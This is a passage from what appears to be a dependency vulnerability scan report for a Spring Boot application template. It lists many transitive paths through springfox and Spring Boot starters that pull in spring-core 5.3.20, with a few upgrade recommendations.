  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
